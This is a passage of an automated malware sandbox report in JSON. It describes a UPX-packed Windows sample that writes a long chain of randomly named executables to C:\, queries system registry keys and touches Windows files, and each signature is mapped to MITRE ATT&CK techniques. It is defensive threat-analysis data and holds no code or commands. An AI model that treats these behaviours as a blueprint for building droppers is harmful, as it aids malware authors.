writable section named \"UPX1\"\n \"8668622.exe\" has an writable section named \"UPX2\"\n \"68646.exe\" has an writable section named \"UPX0\"\n \"68646.exe\" has an writable section named \"UPX1\"\n \"68646.exe\" has an writable section named \"UPX2\"\n \"6844880.exe\" has an writable section named \"UPX0\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"088822.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"xvndjvv.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"60884.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"ldrttb.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"rfhlpxb.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"8668622.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"68646.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"6844880.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"ljvbrr.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"rxvjbx.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"frbnhn.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"dthhtb.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"hxpnnf.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"rtdhhn.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"rjtxj.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"60024.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"0642260.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"8402600.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"tfftdr.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"tjbljn.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"xdnld.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"vfdlx.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"rjlbb.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"ftnpjx.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"\n \"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-LOCALIZATION-L1-2-1.DLL\"\n \"80824.exe\" trying to access non-existent file \"c:\\FLTLIB.DLL\"\n \"80824.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"80824.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"80824.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"80824.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"\n \"80824.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-LOCALIZATION-L1-2-1.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe\" reads file \"c:\\dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe\"\n \"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe\" reads file \"c:\\80824.exe\"\n \"80824.exe\" reads file \"c:\\80824.exe\"\n \"80824.exe\" reads file \"c:\\466844.exe\"\n \"466844.exe\" reads file \"c:\\466844.exe\"\n \"466844.exe\" reads file \"c:\\420260.exe\"\n \"420260.exe\" reads file \"c:\\420260.exe\"\n \"420260.exe\" reads file \"c:\\82466.exe\"\n \"82466.exe\" reads file \"c:\\82466.exe\"\n \"82466.exe\" reads file \"c:\\hvjtfdj.exe\"\n \"hvjtfdj.exe\" reads file \"c:\\hvjtfdj.exe\"\n \"hvjtfdj.exe\" reads file \"c:\\nhftnd.exe\"\n \"nhftnd.exe\" reads file \"c:\\nhftnd.exe\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\\MACHINELANGUAGECONFIGURATION\"; Key: \"\"; Value: \"\")\n \"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\MUI\\SETTINGS\"; Key: \"\"; Value: \"\")\n \"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\CONTROL PANEL\\DESKTOP\"; Key: \"\"; Value: \"\")\n \"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\LANGUAGECONFIGURATION\"; Key: \"\"; Value: \"\")\n \"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"\"; Value: \"\")\n \"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"\"; Value: \"\")\n \"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"\"; Value: \"\")\n \"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"\"; Value: \"\")\n \"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\DIAGNOSTICS\"; Key: \"\"; Value: \"\")\n \"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"\"; Value: \"\")\n \"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\\TRACING\"; Key: \"\"; Value: \"\")\n \"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLEAUT\"; Key: \"\"; Value: \"\")\n \"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")\n \"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SAFEBOOT\\OPTION\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe\" trying to touch file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe\" trying to touch file \"c:\\80824.exe\"\n \"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe\" trying to touch file \"C:\\Windows\\system32\\apphelp.dll\"\n \"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe\" trying to touch file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe\" trying to touch file \"c:\\ui\\SwDRM.dll\"\n \"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe\" trying to touch file \"C:\\Windows\\System32\\imm32.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"80824.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"466844.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"420260.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"82466.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"hvjtfdj.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"nhftnd.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"hthbft.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"hxtnlx.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"pfflf.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"xpvvjv.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"pftnv.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"ddvtj.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe\" writes file \"c:\\80824.exe\"\n \"80824.exe\" writes file \"c:\\466844.exe\"\n \"466844.exe\" writes file \"c:\\420260.exe\"\n \"420260.exe\" writes file \"c:\\82466.exe\"\n \"82466.exe\" writes file \"c:\\hvjtfdj.exe\"\n \"hvjtfdj.exe\" writes file \"c:\\nhftnd.exe\"\n \"nhftnd.exe\" writes file \"c:\\hthbft.exe\"\n \"hthbft.exe\" writes file \"c:\\hxtnlx.exe\"\n \"hxtnlx.exe\" writes file \"c:\\pfflf.exe\"\n \"pfflf.exe\" writes file \"c:\\xpvvjv.exe\"\n \"xpvvjv.exe\" writes file \"c:\\pftnv.exe\"\n \"pftnv.exe\" writes file \"c:\\ddvtj.exe\"\n \"ddvtj.exe\" writes file \"c:\\xjhvjn.exe\"\n \"xjhvjn.exe\" writes file \"c:\\nthpjvt.exe\"\n \"nthpjvt.exe\" writes file \"c:\\jdjdt.exe\"\n \"jdjdt.exe\" writes file \"c:\\hxfhrx.exe\"\n \"hxfhrx.exe\" writes file \"c:\\00666.exe\"\n \"00666.exe\" writes file \"c:\\6666266.exe\"\n \"6666266.exe\" writes file \"c:\\04040.exe\"\n \"04040.exe\" writes file \"c:\\lvnptpp.exe\"\n \"lvnptpp.exe\" writes file \"c:\\vlvdf.exe\"\n \"vlvdf.exe\" writes file \"c:\\vnbvdx.exe\"\n \"vnbvdx.exe\" writes file \"c:\\rdflttb.exe\"\n \"rdflttb.exe\" writes file \"c:\\phxdv.exe\"\n \"phxdv.exe\" writes file \"c:\\hfbbnn.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"80824.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"466844.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"420260.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"82466.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"hvjtfdj.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"nhftnd.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"hthbft.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"hxtnlx.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"pfflf.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"xpvvjv.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"pftnv.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"ddvtj.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"xjhvjn.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"nthpjvt.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"jdjdt.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"hxfhrx.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"00666.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"6666266.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"04040.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"lvnptpp.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"vlvdf.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"vnbvdx.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"rdflttb.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"phxdv.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"PREFERREDUILANGUAGES\"; Value: \"\")\n \"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"MACHINEPREFERREDUILANGUAGES\"; Value: \"\")\n \"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"PREFEREXTERNALMANIFEST\"; Value: \"\")\n \"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSAPPCOMPAT\"; Value: \"\")\n \"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSUSERENABLED\"; Value: \"\")\n \"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORUSESYSTEMHEAP\"; Value: \"\")\n \"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORSYSTEMHEAPISPRIVATE\"; Value: \"\")\n \"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"CWDILLEGALINDLLSEARCH\"; Value: \"\")\n \"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\"; Value: \"\")\n \"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"COMPATDLL\"; Value: \"\")\n \"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"00060101.00060101\"; Value: \"\")\n \"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"SAFEDLLSEARCHMODE\"; Value: \"\")\n \"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"DISABLEMETAFILES\"; Value: \"\")\n \"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"DD73D1627ECFBB1FF2CCF3638564B33CAC9D938C9504B0EB810F5063EA2531C9\"; Value: \"\")\n \"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"LOADAPPINIT_DLLS\"; Value: \"\")\n \"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"AUTHENTICODEENABLED\"; Value: \"\")\n \"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\APPCOMPAT\"; Key: \"DISABLEENGINE\"; Value: \"\")\n \"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\SHELL FOLDERS\"; Key: \"CACHE\"; Value: \"\")\n \"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\"; Key: \"DISABLELOCALOVERRIDE\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"088822.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"xvndjvv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"60884.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"ldrttb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"rfhlpxb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"8668622.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"68646.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"6844880.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"ljvbrr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"rxvjbx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"frbnhn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"dthhtb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"hxpnnf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"rtdhhn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX 